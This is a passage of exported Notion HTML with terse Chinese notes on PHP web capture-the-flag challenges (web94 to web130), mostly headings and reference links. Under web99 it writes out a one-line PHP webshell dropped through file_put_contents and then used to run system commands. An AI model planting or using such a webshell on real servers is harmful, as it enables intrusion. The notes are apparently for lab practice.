9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web94</span></span></h2><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-193233a6c40b805db87ff4c05f5b6f2a" data-id="193233a6c40b805db87ff4c05f5b6f2a"><span><div id="193233a6c40b805db87ff4c05f5b6f2a" class="notion-header-anchor"></div><a class="notion-hash-link" href="#193233a6c40b805db87ff4c05f5b6f2a" title="web95"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web95</span></span></h2><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-193233a6c40b80cb98d2ee1e1a452d1d" data-id="193233a6c40b80cb98d2ee1e1a452d1d"><span><div id="193233a6c40b80cb98d2ee1e1a452d1d" class="notion-header-anchor"></div><a class="notion-hash-link" href="#193233a6c40b80cb98d2ee1e1a452d1d" title="web96"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web96</span></span></h2><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-193233a6c40b807bacd4db3effea5b46" data-id="193233a6c40b807bacd4db3effea5b46"><span><div id="193233a6c40b807bacd4db3effea5b46" class="notion-header-anchor"></div><a class="notion-hash-link" href="#193233a6c40b807bacd4db3effea5b46" title="web97"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web97</span></span></h2><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-193233a6c40b80219579dd81121dd125" data-id="193233a6c40b80219579dd81121dd125"><span><div id="193233a6c40b80219579dd81121dd125" class="notion-header-anchor"></div><a class="notion-hash-link" href="#193233a6c40b80219579dd81121dd125" title="web98"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web98</span></span></h2><div class="notion-text notion-block-193233a6c40b800ea903cea6d8280f3a">如果使用GET方式传参,GET传参会被赋值为POST传参的,又要求$_GET[&#x27;HTTP_FLAG&#x27;]==&#x27;flag’，所以只要同时使用GET,POST传参HTTP_FLAG=flag即可</div><div class="notion-text notion-block-193233a6c40b80039509fe27509b29af"><b>相关知识：</b><b><a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://zh.php.brj.cz/php-zhong-de-san-yuan-yun-suan-fu-yi-xing-zhong-de-tiao-jian">PHP中的三元运算符</a></b></div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-193233a6c40b80cea6d2f7d93359c6b3" data-id="193233a6c40b80cea6d2f7d93359c6b3"><span><div id="193233a6c40b80cea6d2f7d93359c6b3" class="notion-header-anchor"></div><a class="notion-hash-link" href="#193233a6c40b80cea6d2f7d93359c6b3" title="web99"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web99</span></span></h2><div class="notion-text notion-block-193233a6c40b80dfa451e4a275acf654"><a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://www.runoob.com/php/func-filesystem-file-put-contents.html">file_put_contents() 函数</a>：写入文件
当n在随机数中，可以向以n命名的文件写入
?n=1.php
content=&lt;?php @eval($_POST[&#x27;1&#x27;]);?&gt;  #向1.php写入一句话木马
访问1.php   1=system(&#x27;ls&#x27;);   然后cat</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-193233a6c40b8015a0ecc68ff4876a68" data-id="193233a6c40b8015a0ecc68ff4876a68"><span><div id="193233a6c40b8015a0ecc68ff4876a68" class="notion-header-anchor"></div><a class="notion-hash-link" href="#193233a6c40b8015a0ecc68ff4876a68" title="web100"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web100</span></span></h2><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-193233a6c40b80c29aa4c4f51e2d7b74" data-id="193233a6c40b80c29aa4c4f51e2d7b74"><span><div id="193233a6c40b80c29aa4c4f51e2d7b74" class="notion-header-anchor"></div><a class="notion-hash-link" href="#193233a6c40b80c29aa4c4f51e2d7b74" title="web101+103"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web101+103</span></span></h2><div class="notion-text notion-block-194233a6c40b8058b177f55e77f4748f">flag少一位一个个试</div><div class="notion-text notion-block-194233a6c40b801d8574f18af788343a">相关：<a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://blog.csdn.net/joshua317/article/details/120186644">https://blog.csdn.net/joshua317/article/details/120186644</a></div><div class="notion-text notion-block-195233a6c40b80d3aab7f39372f62fd3"><a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://blog.csdn.net/Xxy605/article/details/110109147">https://blog.csdn.net/Xxy605/article/details/110109147</a></div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-193233a6c40b80429b24dbd9c9e301fa" data-id="193233a6c40b80429b24dbd9c9e301fa"><span><div id="193233a6c40b80429b24dbd9c9e301fa" class="notion-header-anchor"></div><a class="notion-hash-link" href="#193233a6c40b80429b24dbd9c9e301fa" title="web102"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web102</span></span></h2><div class="notion-text notion-block-195233a6c40b806081aef76e4440a28f">file_put_contents($v3, $str);<code class="notion-inline-code">的作用就是把变量</code>$str<code class="notion-inline-code">中的内容写入到由</code>$v3<code class="notion-inline-code">指定的文件中，默认会覆盖原有内容，并返回写入的字节数或在失败时返回</code>FALSE</div><div class="notion-text notion-block-195233a6c40b80219e58fac2310d2397">$v2要为纯数字，最终会写入$v3作用后的$v2第三位起的字符，</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-195233a6c40b80ec8512ccb55884dc70" data-id="195233a6c40b80ec8512ccb55884dc70"><span><div id="195233a6c40b80ec8512ccb55884dc70" class="notion-header-anchor"></div><a class="notion-hash-link" href="#195233a6c40b80ec8512ccb55884dc70" title="web104+106"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web104+106</span></span></h2><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-193233a6c40b80279325c65b8106192e" data-id="193233a6c40b80279325c65b8106192e"><span><div id="193233a6c40b80279325c65b8106192e" class="notion-header-anchor"></div><a class="notion-hash-link" href="#193233a6c40b80279325c65b8106192e" title="web105"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web105</span></span></h2><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-193233a6c40b80efb9c3dcb72db6ebf5" data-id="193233a6c40b80efb9c3dcb72db6ebf5"><span><div id="193233a6c40b80efb9c3dcb72db6ebf5" class="notion-header-anchor"></div><a class="notion-hash-link" href="#193233a6c40b80efb9c3dcb72db6ebf5" title="web107"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web107</span></span></h2><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-193233a6c40b803287d3ece469bd170f" data-id="193233a6c40b803287d3ece469bd170f"><span><div id="193233a6c40b803287d3ece469bd170f" class="notion-header-anchor"></div><a class="notion-hash-link" href="#193233a6c40b803287d3ece469bd170f" title="web108"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web108</span></span></h2><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-193233a6c40b802bb50fc807dcee2a70" data-id="193233a6c40b802bb50fc807dcee2a70"><span><div id="193233a6c40b802bb50fc807dcee2a70" class="notion-header-anchor"></div><a class="notion-hash-link" href="#193233a6c40b802bb50fc807dcee2a70" title="web109"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web109</span></span></h2><div class="notion-text notion-block-195233a6c40b802095f2f0086cea8acc">看到eval(&quot;echo new $v1($v2());&quot;);想起web101的反射类</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-193233a6c40b80ceb4aadd82f63f2463" data-id="193233a6c40b80ceb4aadd82f63f2463"><span><div id="193233a6c40b80ceb4aadd82f63f2463" class="notion-header-anchor"></div><a class="notion-hash-link" href="#193233a6c40b80ceb4aadd82f63f2463" title="web110"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web110</span></span></h2><div class="notion-text notion-block-195233a6c40b8060b1f8f28e971d0772">相关知识：<a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://blog.csdn.net/qq_63701832/article/details/131166789">https://blog.csdn.net/qq_63701832/article/details/131166789</a></div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-195233a6c40b8003bacacd73e64f5591" data-id="195233a6c40b8003bacacd73e64f5591"><span><div id="195233a6c40b8003bacacd73e64f5591" class="notion-header-anchor"></div><a class="notion-hash-link" href="#195233a6c40b8003bacacd73e64f5591" title="web111"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web111</span></span></h2><div class="notion-text notion-block-196233a6c40b8009a570c10902aa51c5">相关知识：<a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://www.runoob.com/php/php-superglobals.html">https://www.runoob.com/php/php-superglobals.html</a></div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-193233a6c40b80e5a7ddfba16cdd9203" data-id="193233a6c40b80e5a7ddfba16cdd9203"><span><div id="193233a6c40b80e5a7ddfba16cdd9203" class="notion-header-anchor"></div><a class="notion-hash-link" href="#193233a6c40b80e5a7ddfba16cdd9203" title="web112+114"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web112+114</span></span></h2><div class="notion-text notion-block-196233a6c40b809a8f04e4317f4106fc">相关知识：<a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://blog.csdn.net/wangyuxiang946/article/details/131149171">https://blog.csdn.net/wangyuxiang946/article/details/131149171</a></div><div class="notion-text notion-block-196233a6c40b80f2980ce6dede52cbe6"><a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://www.php.net/manual/zh/wrappers.php">https://www.php.net/manual/zh/wrappers.php</a></div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-193233a6c40b803b8688ffd3846969e1" data-id="193233a6c40b803b8688ffd3846969e1"><span><div id="193233a6c40b803b8688ffd3846969e1" class="notion-header-anchor"></div><a class="notion-hash-link" href="#193233a6c40b803b8688ffd3846969e1" title="web113"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web113</span></span></h2><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-196233a6c40b800da01ae0a208b203d2" data-id="196233a6c40b800da01ae0a208b203d2"><span><div id="196233a6c40b800da01ae0a208b203d2" class="notion-header-anchor"></div><a class="notion-hash-link" href="#196233a6c40b800da01ae0a208b203d2" title="web115"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web115</span></span></h2><div class="notion-text notion-block-196233a6c40b80d78e7cd4ad7e99f9db">用脚本跑</div><div class="notion-blank notion-block-196233a6c40b80e4bfade587418175bd"> </div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-196233a6c40b8090b7b1dd0608ddd280" data-id="196233a6c40b8090b7b1dd0608ddd280"><span><div id="196233a6c40b8090b7b1dd0608ddd280" class="notion-header-anchor"></div><a class="notion-hash-link" href="#196233a6c40b8090b7b1dd0608ddd280" title="web123"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web123</span></span></h2><div class="notion-text notion-block-197233a6c40b809a9058ec71483e37b5">只要保证有参数CTF_SHOW.COM，CTF_SHOW存在，fl0g不能直接用，所以利用eval(&quot;$c&quot;.&quot;;&quot;);  </div><div class="notion-text notion-block-197233a6c40b804f8ea3fc92c4c1d4a9">在php中变量名字是由<b>数字字母和下划线</b>组成的，所以不论用post还是get传入变量名的时候都将空格、+、点、[转换为下划线，因此直接使用CTF_SHOW.COM会被转义为CTF_SHOW_COM,但php中有个特性就是如果传入[，它被转化为_之后，后面的字符就会被保留下来不会被替换</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-197233a6c40b806698c4e42182d1a34e" data-id="197233a6c40b806698c4e42182d1a34e"><span><div id="197233a6c40b806698c4e42182d1a34e" class="notion-header-anchor"></div><a class="notion-hash-link" href="#197233a6c40b806698c4e42182d1a34e" title="web125"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web125</span></span></h2><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-197233a6c40b80cba829c32c1dc00059" data-id="197233a6c40b80cba829c32c1dc00059"><span><div id="197233a6c40b80cba829c32c1dc00059" class="notion-header-anchor"></div><a class="notion-hash-link" href="#197233a6c40b80cba829c32c1dc00059" title="web126"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web126</span></span></h2><div class="notion-text notion-block-197233a6c40b804bbbb1de3a5193fe7c">相关：<a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://blog.csdn.net/RABCDXB/article/details/122050370">https://blog.csdn.net/RABCDXB/article/details/122050370</a></div><div class="notion-text notion-block-197233a6c40b8021ab2fd8b1620ed48b"><a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://blog.csdn.net/Jayjay___/article/details/131638620">https://blog.csdn.net/Jayjay___/article/details/131638620</a></div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-197233a6c40b80328d62e499bce4bacd" data-id="197233a6c40b80328d62e499bce4bacd"><span><div id="197233a6c40b80328d62e499bce4bacd" class="notion-header-anchor"></div><a class="notion-hash-link" href="#197233a6c40b80328d62e499bce4bacd" title="web127"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web127</span></span></h2><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-197233a6c40b8045b209df5a2cb72191" data-id="197233a6c40b8045b209df5a2cb72191"><span><div id="197233a6c40b8045b209df5a2cb72191" class="notion-header-anchor"></div><a class="notion-hash-link" href="#197233a6c40b8045b209df5a2cb72191" title="web128"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web128</span></span></h2><div class="notion-text notion-block-197233a6c40b8049b5cfe6c74502479e">gettext():_<em>()是gettext()的拓展函数 在开启相关设定后,_</em>(&quot;666&quot;)等价于gettext(&quot;666&quot;)，且就返回其中的参数</div><div class="notion-text notion-block-197233a6c40b8086bc46ec0244335c64">get_defined_vars：返回由所有已定义变量所组成的数组，因为包含了flag.php，所以flag.php里面肯定有$flag储存了flag。</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-197233a6c40b801b92c2efff136eab33" data-id="197233a6c40b801b92c2efff136eab33"><span><div id="197233a6c40b801b92c2efff136eab33" class="notion-header-anchor"></div><a class="notion-hash-link" href="#197233a6c40b801b92c2efff136eab33" title="web129"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web129</span></span></h2><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-197233a6c40b8053955bc872615b93da" data-id="197233a6c40b8053955bc872615b93da"><span><div id="197233a6c40b8053955bc872615b93da" class="notion-header-anchor"></div><a class="notion-hash-link" href="#197233a6c40b8053955bc872615b93da" title="web130"><svg 